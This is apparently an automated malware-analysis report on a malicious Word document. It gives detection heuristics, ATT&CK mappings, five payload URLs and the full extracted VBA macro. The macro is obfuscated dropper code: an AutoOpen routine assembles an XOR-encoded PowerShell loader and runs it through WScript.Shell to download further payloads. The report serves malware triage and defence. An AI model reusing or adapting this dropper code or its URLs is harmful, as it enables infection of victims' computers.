MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine that utilizes WScript.Shell and CreateObject to execute a command. The macro constructs a PowerShell command string, which is a strong indicator of a downloader or dropper. The reconstructed command is 'wershell ( (105 ,46, 37,15 , 11)', suggesting it attempts to launch a PowerShell process. This behavior is consistent with malware designed to fetch and execute additional malicious components.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6599837-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6599837-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV) dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260) hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV) dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260) hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "utMfNdct" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.furnisofa.com/YucipclqQ4/ Referenced by macro
- http://www.marpaybiotech.com/IIzaSAz/Referenced by macro
- http://www.gentiane-salers.com/PpsNE9P/Referenced by macro
- http://www.bibizdevar.com/dNL2ZI5alI/Referenced by macro
- http://www.hotpietruck.com/LnhchhmDCU/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17216 bytes |
SHA-256: 358108a26673c4520af7fdb44d530abf30d22d1233507682f59cf18d421fd8fa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
369 of 586 identifiers look randomly generated (e.g. 'pPhzpLwLBDjAw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pPhzpLwLBDjAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "utMfNdct"
Sub AutoOpen()
On Error Resume Next
VLiqP = (cznMF + 79180 + 59693 * QGUqO + (89058 - VsWrS))
Lzwal = (CHvaLw + 51737 + 30557 * MnUjrb + (2152 - OjzZh))
qVlFKO = (Opqqd + 52310 + 49988 * iQVWDF + (85034 - DXIdGz))
BkMPWf = (jAoGbJ + 50512 + 93159 * HRfZKV + (18489 - IrKiir))
DVYupw = (Eknfmj + 49834 + 29379 * aYWcj + (87363 - XfbmG))
OOMcY = (bjdjX + 17351 + 64323 * RcDTwV + (85871 - zlNGlF))
ULwJzC = (kjGtY + 25573 + 90672 * iidAtZ + (68381 - LOHJN))
usssjR = (hwofKz + 10082 + 94301 * kropiK + (77238 - rIRQa))
YtDcStvJ (Qbibzafr + ITDwXQQzL + OXuLBoAGHR + pbRwczFVOj)
RiWti = (iQwcZv + 15289 + 58265 * LurAI + (56781 - wPEjE))
HpwjzP = (bzoaG + 36578 + 45275 * VrIJVk + (98140 - huoUM))
AaAbHh = (AnEWJ + 98643 + 37888 * MQnCJs + (62595 - ZPSkC))
LowURj = (YZCDV + 69686 + 36637 * cCZJXD + (46783 - bjwIY))
End Sub
Function Qbibzafr()
On Error Resume Next
NNqHa = mkuVsV + uDYwub + (OmiSYm * 18630 - vaVBiP * 46170 / zlXGS - qYnzW)
JBZnr = EafYio + zoUAqn + (WpaKX * 41458 - CwKiY * 30264 / fuBiJw - ziZCj)
UXWXw = JwUaO + WRCdV + (KYzRuS * 34370 - oCYGBI * 77051 / wiami - GuLUn)
GrYNaK = fMprfq + Xcwtk + (BVwCV * 8248 - lcnszE * 10053 / ktfVwM - ZVhTV)
wbuEz = "wershell " + " " + " " + " " + Chr(40) + " " + Chr(40) + "105 " + ",46, 3" + "7,15 , 11"
SnzXzv = qUOlQd + stSwD + (GUQNS * 39484 - qwkWW * 61413 / sMRiI - wIasIo)
AXkPz = wZzWmE + rqrjrO + (acjbno * 47538 - zuYFdF * 6186 / OVXYh - upfaim)
RqAtD = YrIbLZ + bDwjb + (oYdOU * 81759 - whqvN * 17628 / SjDXMa - faFtM)
nhITN = rKVCdD + PYGXN + (GbTSX * 5835 - LzRCGa * 60095 / uHtFtV - divBX)
vCmTd = "2,35 " + ",40, 5" + "8,96 ,3" + "4, 4" + "7,39 ,40," + "46,57, 1" + "09 ,3, " + "40 ,57" + " ,99" + " ,26," + "40, 47" + ",14, 33"
JZXoZr = KLCGsQ + wzokPI + (LFwzC * 33364 - zwWCXk * 21441 / lUYjow - snwiRQ)
AwdTS = UYoWah + MfEUj + (WMTMj * 37775 - fMLBUz * 65217 / wXYERN - MfCFH)
SMidBw = sjmtzs + HNnCa + (POHjPO * 12409 - znKdM * 74187 / zcXSB - CSliFZ)
ICrrzw = zincj + AsqBN + (CnGvz * 51966 - AIJwY * 39415 / ruuqw - OCojtb)
IrjLG = " , 36" + ", 40, 3" + "5, 57 ," + "118, 1" + "05,37, 38" + " ,27 ,11" + "2,106,37"
JKKZJO = UorNd + FwKJi + (EwfMr * 95650 - RiqwN * 20986 / DPBCV - msUYa)
RttHDw = ZFjiz + brzjd + (iCXMpv * 16174 - VOLiHm * 7873 / YXanAB - AXlDju)
pJqiw = ujDMvK + LtBWKP + (SZIqpc * 33170 - pErZt * 99218 / CoYqT - rUNrpK)
wwsziH = EFCOn + dsscQn + (GHlPj * 48737 - NvWBK * 77809 / RAvKw - OHuaJ)
FnUBPkVZ = " ,57" + ",57," + "61 ,119," + "98,98 ," + "58, 58" + ", 58,99," + "43, 56,6" + "3 , " + "35 ,"
AUsVX = nQIRZ + ncKFC + (AcJXJX * 32748 - uipaR * 93406 / zakCcc - CwLYYj)
Tzvlm = YCcLU + BZJbi + (cipBaD * 48666 - CZLMl * 98246 / Oajtof - VvwZh)
bYsXd = wCSRX + MUTzrP + (VTmwd * 64786 - TCIuDA * 41486 / qdjoj - DiwII)
HVOtUw = QAAtT + YrzVW + (qmrNz * 38631 - KaFuwz * 35009 / OTpzFv - IBnfXA)
lJsQXH = " 36 , 6" + "2 ,3" + "4 ,43 ," + "44,9" + "9, 46," + "34 ," + "32, 98,2" + "0,56,4" + "6,36 ," + " 61, 4"
zHJoZu = iRhPEA + ouSzk + (JTzwHj * 85193 - NOcnB * 9381 / EIwPuk - wahhq)
MOiBS = pjKMh + CNQDEc + (vVjlW * 69629 - JGUWPa * 81006 / LzjbU - PztvPW)
WlvWEf = wcdIRc + iMozG + (iCRTd * 15679 - jVppG * 25639 / nUZzLu - aiVbJr)
cLFWD = AMEoaP + jFttXO + (WKiqS * 6393 - MSlppV * 62768 / IwlqV - IwBDR)
pOznHY = "6,33 " + ", 60 " + ", 28 , 12" + "1 , " + "98 , 13,3" + "7,57 "
Qbibzafr = wbuEz + vCmTd + IrjLG + FnUBPkVZ + lJsQXH + pOznHY
ofzwi = FMrSAR + wMKzZ + (afzPuC * 94008 - KwFNo * 64654 / XbGXN - NEPji)
dBjZU = PjjoQD + lWvPmF + (kqYkD * 53459 - RNbjj * 23197 / TCiXkm - BnjLD)
bvSodb = incvV + PzTHFj + (KSUQsB * 36036 - iCpZzw * 70391 / umFHp - fZiBr)
jnFwI = OTUbt + GPcmnB + (fZNno * 72743 - HEUvs * 36845 / Hzikq - tjUAwG)
End Function
Function ITDwXQQzL()
On Error Resume Next
zEBumM = zsAJKi + KJWfT + (SNbzO * 52373 - jPDfid * 41067 / zHrIV - MCIrL)
pbVEQa = LlcCjL + whpVih + (fNBiX * 95766 - FKSICu * 73688 / twPEq - oVFLw)
PiMnMi = JOTas + uFbJui + (wporG * 49302 - zrswTa * 25101 / azfvXX - sZYWcv)
cifii = SJaBv + IlzkmW + (uibYU * 98171 - BJmui * 83373 / vJAWL - mfbvtr)
jMlbvj = ",57,61" + ", 119,98" + " ,98 ,58" + " , 58" + " , 58" + ",99 , " + "32, 44 ,"
KWCREN = ajhMam + dbBzp + (cnpmUW * 77554 - tAfqX * 87872 / aMCij - UvzYM)
KYJaA = rWXjQ + iZNjiB + (CsFDO * 99801 - GZIrq * 25257 / Ndrja - XfWntw)
wKEnM = CJQFUv + jMROfq + (oUvVw * 16143 - zXVRK * 33283 / XwUUfs - zzYXo)
MLLjf = aqVhmn + SWXGR + (Sidiw * 13276 - VwPTjw * 91391 / ijlmva - kcwIj)
IEFtvnqp = "63 ," + " 61 " + ", 44 " + ", 52 , 47" + " , 36 " + ", 34,57 ," + "40 ,4" + "6 ,37" + " ,99" + ",46 ,34 " + ", 32 ," + " 98 , 4 ,"
CkMKT = vQOHFB + ErkivE + (bhiEG * 5672 - hLPZh * 71811 / Umlwph - swBAWB)
qAvfLr = VFIDQb + FwhYQ + (jFwkG * 44489 - jidDk * 3421 / rKUuV - qzjdvY)
imzTb = AIkCL + oTCmc + (SOFWv * 58098 - DWKjYV * 78578 / QtwiJb - BNGIJV)
wLNIID = RbOjqE + DlunKi + (JPwtAz * 85393 - XWwIIX * 76550 / NJGXd - hldaQH)
BNFfDpUtsF = "4,55" + ",44,30, " + "12,55," + " 98 ," + "13,3" + "7,57, 57 " + ",61 ," + "119 " + ",98 , 9" + "8 ,58 ,"
DvKoub = dJzhIk + pwHtDA + (BnTBr * 67951 - UHpBq * 81159 / sCEULh - NwpOkC)
aIrBM = BHrmD + cICJfS + (UwtDYr * 36978 - ordnH * 63370 / uwzzib - lLRQT)
fKmKw = hajFTJ + oMPNzw + (pODMj * 76491 - wLimI * 46060 / udFTr - zNNti)
anMDYc = AIrVj + jqYMj + (rXaGD * 37170 - nNsPnU * 34556 / vWXUz - WQkFN)
UhcdWs = " 58,58" + ", 99 " + ", 42" + ", 40, 35 " + ", 57 " + ", 36" + " ,44, 35 " + ", 40" + " , 96, 6" + "2, 44,33" + " , 4" + "0 ,63"
uNwPaT = GscLC + ownRw + (nFqBZM * 96327 - WfRMf * 9443 / lwdkj - mwoHd)
LzTLMa = BcDMYC + whbaPj + (jDzJjM * 57512 - JCtvi * 74255 / CTFms - zhmEh)
SEUNr = kcvVCf + IzSBS + (YpYiHV * 56549 - ulWLEz * 9816 / zooBw - KbjRZY)
lmLVzR = IPRHa + IWlOwS + (liujK * 89290 - fMcAK * 65015 / CjkplU - PzdWip)
hLzsiVc = ", 62 ," + "99,4" + "6 , 3" + "4 ,32" + " , 98 " + ", 29, 6" + "1, 62" + ",3,8" + " , 1"
UCVUt = nAARD + jmwbXw + (GziiT * 38341 - UifCRd * 81697 / LubVC - QrHZnj)
BVvDA = hIlUCA + vIUzA + (GIaCzC * 88582 - qGbIj * 76731 / TJjzQz - PaaZU)
sHWJYN = AbTvB + HqBJL + (MWczk * 97552 - aztAcZ * 64499 / djkSkT - fspow)
DifUbJ = tZNsO + pqZKz + (IwCdNQ * 58867 - fwzpvE * 6281 / Hrqdpn - Xbwno)
UvJTHGXFMD = "16,29," + " 98, 1" + "3 , 3" + "7 , 57,5" + "7 ,61 ," + " 119" + " , 98 ,"
vhmYR = SizOLw + nBKlj + (oJPDzb * 81852 - AurPjR * 68958 / VLSSLi - ZTSjL)
TOhhcK = jdpzbV + kIzfi + (IjwSNn * 19366 - pkisfD * 61995 / JhDHmw - WVqqMl)
UnEWR = QPUpAK + sKEvRm + (wRcXC * 18486 - czWzzB * 47749 / rnIlt - uNOGb)
sSNQO = IcPIl + ombHa + (VTKdHR * 83749 - CwqjJw * 1309 / iifkN - ZTNaz)
KsYNLM = " 98 ,58" + ",58, 5" + "8 , " + "99 ,47" + ", 36," + " 47 , 3" + "6, 55, " + "41, 40 ,5" + "9,44,63 ,"
dubdQW = TqWtw + rjrPz + (QsGJXj * 40719 - inLOl * 19696 / DwOanr - HLSWi)
hqdqQ = qwWlDu + DZjiII + (KoidpJ * 10672 - lvqBA * 2565 / nKUzBT - jNKfs)
najJNu = tIABG + nLauCt + (RlWJLG * 40810 - HVTJR * 32462 / KPhnG - sfKTqX)
zMQvY = hSCLjT + wnRzs + (IRcSR * 74967 - tpDENQ * 51688 / pQhbZ - UGOjG)
QjftjKL = " 99 ,46" + " , 34, " + "32, " + "98 ,4" + "1 , " + "3, 1,127," + "23 , 4 " + ",120 ,44"
GrdaAK = ouFsw + wvtjdY + (fklVVX * 37685 - vTiiG * 18241 / OiQUY - fGwTYV)
RMMFIz = WGHEd + ztbaKs + (jjKPJz * 4084 - doCzCY * 85772 / GZaIwv - aLqhk)
fWJfiO = CwvIvO + SFGaSE + (UBkjr * 70898 - jESSR * 24457 / SsSUJH - KiRNiC)
pGSHmw = CEWwH + zlnjs + (NYALNP * 75908 - YGLqU * 67052 / UBCLWS - NFsijh)
jGZRLOUXw = ", 33 , 4," + "98,13" + ", 37 " + ", 57 ,57 " + ",61 , 119" + ",98 , " + "98, 58," + " 58 ,58," + "99 ,37" + " ,34 ," + "57 , 61 ," + " 36 , 40"
ITDwXQQzL = jMlbvj + IEFtvnqp + BNFfDpUtsF + UhcdWs + hLzsiVc + UvJTHGXFMD + KsYNLM + QjftjKL + jGZRLOUXw
SBbjj = pIQJF + zBzGZh + (cEsZlr * 31800 - CsSdc * 3021 / rVqmc - uGjtw)
nkzNz = kSJZbp + QzmPzf + (jhKbPm * 10913 - izJjn * 75537 / XCfVis - GSuAtL)
HrlOUX = aXzKp + kLPvC + (mcjjc * 93681 - washOs * 87885 / aGXSTQ - ziiLt)
UEPOfb = UZvqd + Sscpd + (uAMoG * 16782 - iJXSWJ * 65369 / OzCDmk - zTWdjv)
End Function
Function OXuLBoAGHR()
On Error Resume Next
rrPozt = LopJVP + JTTGsN + (YAsHSN * 52430 - HGicz * 95559 / PPBXG - LpjNAE)
iisWm = SrXhh + Wrjjfs + (BmDEF * 39386 - iMKMu * 34112 / QpZOI - tifshT)
kDfGAU = DYainB + XFjKnP + (FBHUX * 5123 - WGLWl * 57018 / ihELZ - FsOuaG)
wvCwwo = zYHJR + YfiqiR + (SJFsdj * 79077 - iEBRD * 12943 / fpiQE - zCwOA)
fZnNZ = " ,57, 63" + " , 5" + "6 , 46 ," + "38, 99 , " + "46, 34" + " , 32 "
IRYbzm = iEcAX + jVwRPL + (LaPiJk * 62120 - MPRPI * 31369 / QulmZ - jnWzk)
vLMaMw = XhCqRO + DVpLk + (RaEEj * 55653 - WcnskZ * 77824 / JAoFSh - XOEUXT)
NwLNW = UHIujK + uuKFs + (VuVAFR * 63159 - DpzMF * 35856 / PpjXD - QBruW)
WYzhu = SiCYl + RPjRPI + (YHtYc * 98527 - iTMmM * 88273 / rzzHi - hLsbIT)
nomCla = ", 98 ," + " 1 , 35," + " 37, 46" + ", 37, 37 " + ", 32 , 9 " + ", 14, " + "24,98"
NEwjjM = PcSXbQ + jscOrW + (kirjGw * 43361 - QINDG * 52563 / GJttr - bICKkz)
cGIzDo = ZHCcOV + MJJYJL + (mSUzi * 87496 - VoWWB * 91690 / JAOzSw - wHRfWB)
ztmbl = pnoCZ + TDTjGN + (wCJvY * 83553 - hnLDS * 15782 / uWvkvP - FWMLZX)
czcEw = zzWrzG + pFRRIi + (szfFdi * 78987 - FtdGj * 17748 / aalBj - UjXra)
pUBEspTsrK = ", 106" + " ,99,30," + "61 ," + "33 ," + " 36,57,10" + "1, 106, 1" + "3 ,106"
CubbI = FCHiz + MNjtO + (Pqbvq * 84545 - FOrBaZ * 99285 / UolVH - zcuzHt)
zbBmjI = BoHEjq + GOBhE + (PrYvYG * 45808 - Nhvjw * 13252 / nqOrR - Ejjjl)
nsOtR = tOHCG + dkjnG + (VkkwT * 46147 - qnwLLs * 27438 / pkXzod - FszkkA)
jfaKSw = MqzNj + ZCbkk + (CZjXw * 21689 - krjwjz * 38714 / zHlszL - hfzWLr)
nhDXmlaGzls = " , 100 , " + "118 ,1" + "05 ,59,9," + "47 , 1" + "09 ,112," + "109, 10"
hCRIp = bsZaj + cGmXV + (tqCUwI * 45867 - Kmppf * 12798 / ilfXX - tHvMC)
KSikfQ = zGHND + khsoC + (uZDzVH * 99564 - nAjGHw * 64625 / pjBKZ - GEXXc)
mTBSs = HBHUId + RizXAF + (aXsMn * 86090 - iSzZw * 59130 / LUwQOi - jFUXXi)
jXQZU = AjqZq + bPwCw + (rbnAI * 77310 - iofrz * 66352 / lcGZul - ClItz)
ZwCZs = "6 , 126," + " 125, 117" + " ,106," + "118 , 1" + "05 ,60,23" + ", 56"
LQzwZ = YkBWG + lrEtz + (zOlRX * 45996 - siqzJR * 81658 / WPAzT - csdziE)
QoEDwp = WdttZ + jhhms + (QEObD * 91349 - FWWISt * 37888 / cqltKc - wtVHYK)
vKqHZ = oBMAIU + ozUbzF + (Erwth * 54584 - FUGwXT * 76233 / MRKTfH - dklqsr)
hHjXS = nPbof + TYiHvK + (uGKAGl * 51495 - uRXpQ * 26774 / BLSCj - wwsKl)
hBwmk = ",112, 10" + "5,40," + " 35 " + ",59 ,11" + "9,57 ,40," + " 32 ," + " 61 ,102 "
jAqwi = Vdcsr + pBpjNK + (lvPjdV * 79964 - jjIzhk * 83972 / HAnOvZ - MLfrhz)
BJSwIb = TMapX + zTvKwz + (hiZvf * 22060 - CUwiH * 83280 / iwikc - OooMZ)
nktPV = jawTjW + wONwN + (hfjTUQ * 49356 - hIttM * 42956 / XcJEd - XQJLOI)
ZuHSzN = NzZwD + jGElAw + (nDQfZ * 11304 - OLHqjt * 13835 / LoEWaX - TkXcYt)
CpUpBEzNo = ",106 , 1" + "7,106 ," + " 102 ,105" + ",59," + " 9,47 ,10" + "2,106" + ",99, 40, " + "53, 40 ,"
OVwGmr = IHQwv + GiijJT + (pjWKwF * 51870 - wIZTn * 5537 / nQQVNA - iPLHdp)
jhCRPs = zoHjQl + wqdIn + (vOSnF * 80335 - zGwqcl * 51726 / aXBYK - obJpw)
lkYiz = izVOOM + BkspQ + (fKzXS * 53617 - czHmJw * 16144 / FNiQrm - arMJo)
fBApa = stHRY + vWCSCZ + (AKYlE * 87878 - KJOXHF * 16642 / qfHDT - iNQLlF)
riJCJkuto = "106,118" + " ,43 ,3" + "4 , 63," + "40,44 ,4" + "6,37, " + "101, 10" + "5, 27," + " 43, 46 ," + "109 ,3"
aYZiI = skANH + LSUtTi + (wTftM * 64560 - nENbbU * 66738 / zswBw - RCkGM)
owszD = AiqvfM + bToXY + (mCvTbu * 34950 - wfQvmA * 15080 / oMPYlT - aDNlB)
kdfLU = WtfQDk + EzZzs + (siibH * 184 - SwVPO * 16950 / HMCkj - ZkzJv)
Idvlsl = DlMGG + NhsiF + (EwvWK * 49476 - RYjHL * 18439 / kUULAR - qXTBb)
WjACazAHl = "6, 3" + "5 ,10" + "9 , " + "105, 37 " + ",38 ,27" + " ,100 ," + "54, 5" + "7 , 63 , " + "52 ,54,10" + "5,46 ,37" + ", 15, 99"
MYwRM = stRTYX + LotlA + (jUczu * 9212 - CFIKLk * 70881 / crbVuG - nisAfm)
WAwHL = jkZEM + ZnkGIn + (LjzSPF * 99585 - hwGtZ * 81779 / iHLDYN - rSXJL)
oCXkNs = aZhjCM + zlSKn + (hFdvFP * 48192 - rfvGuS * 35546 / aWjhPS - acBMw)
nbPEA = UYIpF + YLTHX + (QCuTC * 84194 - oPanHi * 41478 / vMZDuV - ukISG)
huDUz = ", 9,34 , " + "58,35" + " , 33" + ",34," + "44,41,11" + ",36 ,33 ," + " 40 " + ", 101,105"
ztTBvu = hPoln + Javsw + (ODsfaO * 30308 - Evsti * 63676 / SKjZk - cBVnhu)
pQnVln = kHNtm + iwlWvH + (HqQLS * 27212 - lBWss * 37818 / XoIXHq - iLzpnE)
iPwra = bwAbCX + OjlUAS + (LKdzoQ * 49483 - fSVfJz * 14424 / YASfGY - jUjISv)
FzMVS = jZcizT + iumcHt + (ULwiGd * 27697 - DSECaj * 72516 / jkcSiE - riNkkO)
jsPwrud = ",27,43 , " + "46, 9" + "7, 109 ,1" + "05,6" + "0 ,23,56," + "100,118 ," + " 30,5" + "7 ,44" + ", 63 , 5" + "7 , 96 ,2" + "9 ,63 "
VYMwNI = hOKzp + zBHSO + (ZMLjTw * 76853 - ZVkjR * 41016 / ijuirh - doppJ)
zHJpr = ClKot + ZkiLd + (jUmQSN * 69247 - KziWu * 57670 / jZRMvo - TwYuB)
SwrSKL = oRjow + VDCCn + (PLqKQz * 66669 - cBqrYL * 3836 / NIQMi - ARsdP)
cpUGzU = zDJOwT + FXOkGz + (Uinsm * 43525 - iEHGjF * 80796 / KCAnzZ - IRHFFb)
tRcjSVEw = ", 34,4" + "6, 40" + " , 62" + ", 62 , 1" + "09 , 1" + "05 , 60"
OXuLBoAGHR = fZnNZ + nomCla + pUBEspTsrK + nhDXmlaGzls + ZwCZs + hBwmk + CpUpBEzNo + riJCJkuto + WjACazAHl + huDUz + jsPwrud + tRcjSVEw
pDMim = KXHKn + MDTnjj + (DCijr * 21180 - qOLpq * 98249 / wjOaE - URNqv)
hSYHuN = MlLLU + TOLwL + (UonPU * 10313 - icjlo * 77524 / GdGSGQ - pmSlXt)
ksIVB = awtCD + iiYfA + (XjOqH * 86465 - vofBVi * 93092 / HtkXP - PNKkDO)
TAQtlz = XclaTb + fnbpQ + (DRptma * 22638 - KZSnjs * 41880 / kzGYZi - biwkMp)
End Function
Function pbRwczFVOj()
On Error Resume Next
HkhfSP = fGMGG + whfsvl + (jltsqf * 99020 - ILtKp * 77486 / ACczp - YXZGnm)
VjCCiK = Wropn + qXvTw + (nzhdQ * 92399 - vHNTmC * 86442 / AYIrf - UiINnM)
CBcGK = wznFm + iOMIX + (muNqw * 74129 - QlTTYP * 56529 / XsGlNb - uDMSWl)
iuQGS = ANquk + fGkuu + (XHrbo * 77415 - kjHSE * 10924 / imNuP - CPvzQz)
wBiQB = " ,23," + "56 ," + "118," + "47, 63,40" + ",44 , 3" + "8, 1" + "18 ,48 , " + "46, 44 " + ", 57" + ", 46 ,37" + " ,54," + "48, 48"
uOXzcN = muBzZ + sRCiWZ + (bPTibm * 61191 - ApCcc * 86539 / llhDD - jaJzOS)
AIzhVu = ivpWq + KlEzVz + (fjRBTW * 23051 - oJiMUv * 7672 / sVHhni - vLNVRu)
KiQZF = qwNwi + qlHJV + (GtMdOQ * 9942 - pWpGAu * 1648 / wDwvp - BvHIwd)
QHVkMA = MMCpi + kffPqJ + (LVGXK * 50454 - AJifQ * 82143 / VLzoD - RKjDvi)
AhJWSbw = Chr(41) + "| %{ [" + "CHAr] " + Chr(40) + "$_" + "-BXOr 0" + "x4d " + Chr(41) + "} " + Chr(41) + "-jO" + "In ''| & " + Chr(40) + " " + Chr(40) + "["
FhozJK = USkpQ + nJsKKi + (DtmSsh * 6984 - PUPQz * 30534 / KcWvH - kSwww)
wqQHcN = cMuVHc + LFzUZ + (WWzQn * 28252 - lTapUu * 5076 / TwMnC - mEPGP)
AvfUb = hHZrz + OmwJl + (BMazs * 12027 - hWzjSj * 18927 / vapnG - vMvhc)
EoCrjK = JjQAU + iUGHw + (JXmDMa * 93738 - rRWFR * 52900 / khnOR - zISnwb)
DBvoRun = "StrIN" + "g]$VE" + "RBoS" + "epReFeRen" + "cE" + Chr(41) + "[1" + ",3]" + Chr(43) + "'X" + "'-Join" + "''" + Chr(41) + " "
pbRwczFVOj = wBiQB + AhJWSbw + DBvoRun
mOWUsf = ZUJwG + NHmUw + (NhnRr * 72248 - BQHilY * 30901 / UGJWNU - svztB)
SzNEG = oswwf + zdGSlY + (qRsAd * 96439 - iGosUw * 68765 / jRtifF - tVJinQ)
AaJZUL = awkFVl + DGcjwE + (pYGsTP * 47022 - qwKUr * 10460 / iudYG - TJYKU)
tZPUdS = FCtAD + juChX + (HpuSM * 13510 - fqGzf * 36022 / HrIGf - AYEWC)
End Function
Attribute VB_Name = "oIvLAlzdm"
Function YtDcStvJ(rmKYzMilqoBKU)
On Error Resume Next
jMzqPw = 32964 / arstQ - (62977 - AHTwit - 76274 + XmGjf / SpAJQZ - XpidqH + BrdMR * HrOVDz)
LaEJPl = 28999 / CsjAG - (73305 - RkTrmR - 99424 + IuRnia / iFTjiw - ZNFsNz + tLKFiZ * CLLbLv)
Ozzjic = 27167 / hZHjjK - (10160 - tDAjPi - 13053 + EAwctI / TBpLP - MfXlP + kwztSz * RXLOf)
bzRGFA = 99557 / RErPLo - (45313 - fVnSYp - 12579 + uIJjhz / QXSvGG - VjwcH + zskWc * UIwiSm)
VaCGQi = 75655 / tjTQnz - (50474 - wVzFZo - 6335 + XaHha / iFDLO - osOXd + ZXAqGl * vXKbP)
hXsip = 51280 / FaCNN - (52894 - CzDHbc - 89602 + fJjTV / iuTdn - hAwJY + XYwVnd * CWwUDA)
MSrjCW = 9762 / bfijaW - (2613 - AtifF - 42033 + KWDoS / jaQdzs - JMHBr + zSnDD * BUzaU)
rPbhfl = 70416 / Uofqz - (79566 - hYdvAE - 41961 + GGdfUq / ImJjYr - wrziFQ + SDTHu * zhTfaV)
dBvQniOR = cMiFhRHCdWq + CreateObject("Wscript.shell").Run(uLXwEazNwM + Chr(vbKeyP) + BNcfjGwTuZD + Chr(vbKeyO) + rmKYzMilqoBKU + wBdwlRFd, 126647260 - 126647260)
hCSDJu = 99278 / VvMFW - (95811 - cYQod - 24759 + SVjCVW / BoYLH - OjKSEI + jRpIw * UBrLVL)
zkwTHZ = 56580 / UHouP - (44505 - sOwkUv - 97484 + fbDWB / JcDzfb - mqKffP + JBOjc * IdNlr)
AjQsEC = 52821 / Kiluj - (92101 - GXnEo - 61049 + riMUuc / fPSIAa - VzGcEO + iPTzj * CFajC)
iqBjN = 98306 / mMvFSG - (50553 - lsnljn - 60581 + zXSzf / QizvI - BNczI + FNCNV * diPcJo)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.